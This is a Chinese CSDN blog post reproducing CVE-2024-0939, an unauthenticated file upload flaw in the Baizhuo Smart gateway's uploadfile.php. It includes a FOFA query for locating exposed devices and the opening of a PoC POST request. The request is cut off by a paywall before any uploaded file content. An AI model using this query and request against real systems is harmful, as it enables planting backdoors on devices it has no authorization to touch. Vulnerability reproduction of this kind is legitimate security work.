百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)

已于 2024-02-07 02:47:48 修改
阅读量982 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-02-07 02:46:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136064473
版权

0x01 产品简介

百卓Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。

0x02 漏洞概述

百卓Smart管理平台 uploadfile.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。

0x03 影响范围

smart_s210

smart_s210_firmware

0x04 复现环境

FOFA:title="Smart管理平台"

0x05 漏洞复现

PoC

POST /Tool/uploadfile.php? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1397
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2023-4120:百卓智能Smart多业务安全网关智能管理平台SQL注入漏洞复现
薛定谔嘚喵博客
10-08 462
北京百卓智能Smart管理平台S40~S85F发现漏洞漏洞编号CVE-2023-4120,级别为严重。此漏洞特征于管理组件文件 importhtml.php 的功能处理逻辑,对参数 sql 的传参处过滤不严,导致任意SQL语句的执行,造成任意恶意文件的写入,该漏洞已向公众披露并可能被使用。
百卓Smart管理平台 uploadfile.php 文件上传漏洞CVE-2024-0939
holyxp的博客
02-07 1192
百卓 Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)
weixin_52204925的博客
02-09 1215
百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)
百卓Smart管理平台 file/upload接口文件上传漏洞-0day未公开漏洞
weixin_43167326的博客
02-08 336
百卓 Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
复现CVE-2024-0939 smart管理平台漏洞_55
fushuang333的博客
02-21 659
复现CVE-2024-0939 smart管理系统文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
泛微 E-Office 任意文件上传漏洞 CVE-2023-2648(漏洞复现
LHBD_R的博客
06-21 2783
漏洞介绍:泛微 E-Office 9.5版本中文件上传处理程序接口uploadify.php参数Filedata的操作导致任意文件上传,攻击者可以通过远程控制接口上传恶意文件
UCMS文件上传漏洞(CVE-2020-25483)复现
锋刃科技的博客
11-27 3109
简介 UCMS是一套使用PHP语言编写的内容管理系统。 漏洞概述 UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。 影响版本 UCMS v1.4.8 环境搭建 到官网http://uuu.la/下载源码 http://uuu.la/uploadfile/file/ucms_1.4.8.zip 解压到web目录 访问http://<you ip>/install/index.php进行
JeeSpringCloud uploadFile.jsp 文件上传漏洞复现
0xSec
11-28 910
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台。JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件,并可通过 uploadPath 参数指定文件上传路径,导致服务器被控制。
漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
做自己喜欢的事,并将其发挥到极致!
11-29 5211
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台。 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 泛微e-office V9.0 0x03 漏洞复现 访问界面如下 ...
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
CVE-2021-21972
03-04
该脚本根据POST请求中的以下PATH“ / ui / vropspluginui / rest / services / uploadova”,查找CVE-2021-21972的存在,并在响应正文(500)中查找单词“ uploadFile”,表示vCenter可通过POST接受文件而没有任何...
你不知道的文件上传漏洞php代码分析
12-18
漏洞描述 开发中文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。 文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir...
文件和图片上传PHP类.zip
07-11
<?php  */ class UploadFile{ ... // 缩略图最大高度图片上传在我们在项目中经常用到,几乎没有任何一个项目可以脱离图片或者是文件上传。这次给大家带来的就是一个好用的文件和图片上传PHP
jsp+javabean_uploadfile.rar_java uploadfile_jsp uploadfi_jsp 文件上
09-23
实现jsp+javabean多文件上传代码
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1419
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 447
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 954
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 1079
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
uni-app uni.uploadFile上传多文件前后端java代码
04-26
很抱歉,我无法提供代码的参考,因为我是一名语言模型AI,没有能力编写代码。但是,我可以向您推荐一些相关的资源和文章,以帮助您解决您的问题。 首先,您可以查阅uni-app和uni.uploadFile的官方文档,以深入了解如何使用这个功能上传多个文件。对于后端Java代码,请在服务器端参考Java Servlet规范和Java EE规范。您也可以查找一些示例代码和教程,了解如何在Java中实现多文件上传。以下是一些可能有用的资源: - uni-app官方文档:https://uniapp.dcloud.net.cn/api/request/network-file - Java EE规范:https://docs.oracle.com/javaee/6/tutorial/doc/bnadx.html - 多文件上传示例:https://www.tutorialspoint.com/servlets/servlets-file-uploading.htm 希望这些信息能对您有所帮助,如果您有其他问题或需要更多的指导,请告诉我,我会尽力为您提供更好的帮助和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值